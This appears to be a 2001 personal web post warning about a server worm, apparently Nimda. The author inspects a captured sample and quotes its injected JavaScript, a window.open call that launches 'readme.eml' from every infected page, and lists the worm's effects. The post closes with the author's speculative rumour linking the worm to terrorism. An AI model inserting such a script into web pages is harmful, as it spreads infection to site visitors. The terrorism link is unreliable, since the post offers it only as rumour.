I had to patch my router and add some new filters to stay on line.
This one sends 16 messages at a time. as opposed to the CODE RED
which was only exploiting one hole.
I found that most of the machines had only up to 6 vulnerabilities during August infections.
the ones that had up to 6 were able to be shut down by davebrits script.
Yesterday, I found one with 13 vulnerabilities.!!!!
then when I linked to that machine it sent a copy of the bug to me via http.
Mozilla popped up and said what to do with this octet-binary.
Then, I said, send it to hexedit.
so hex edit opens and totally surprised to see: <b> like a dictionary of Windows hacks inside of this thing!!!</b>
plus a javascript which it attaches to the bottom of every html page on the server.
the javascript is basically
<b>window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</b>
6000 from the top of the window that is....!!!
Internet explorer(OSX) just tried to display the multipart mime information in a window it opened at the top of the screen. (not at 6000!!!)
some people still might answer yes to execution on windows or save to disk and then double click it to open it.
the file was called readme.eml
when you save it, it naturally saves as readme.exe (or 2983fejy.exe)
Never much of a reason to put a readme into an executable...these days.
Anyway, the site I found was owned by the Japanese government and was an information site for kids and parents about some activity center.
I nabbed their fax number and sent them a message
(Japanese seem to never have a contact e-mail address on the web site <br>comes from using windows I guess).
the site was missing in the morning.
Then the same code may become embeded in every mail message which goes out from the server.
unpatched versions of outlook will open it and execute without any warning.
<blockquote>
So this thing is really easy to get..... especially in the family computer.
</blockquote>
<b>
and then it proceeds to <br>--replace a bunch of other files with itself(so it runs often if you use the machine--if you can actually use one of these machines.),<br>-- give "guest" admin priveliges, <br>--share all of your drives to the net. <br>--mess up your mail and all your webpages
!!!
</b>
so, Like Bush is planning, someone is just <br>"smoking Microsoft out of their
holes and they will be Destroyed".
The Attorney General denies it, but certainly the persistant rumor in my mind
is that this is related to a Terroristic attack on the internet.
<ul>
<li>First discovered 9:00am one week after the Attack on WTC.
<li>also this is exactly 3 months from Microsoft announcement of the discovery of CODE RED I June 18 th, 2001.
</ul>
<i>mac users stay alert please.!!!!!!</i>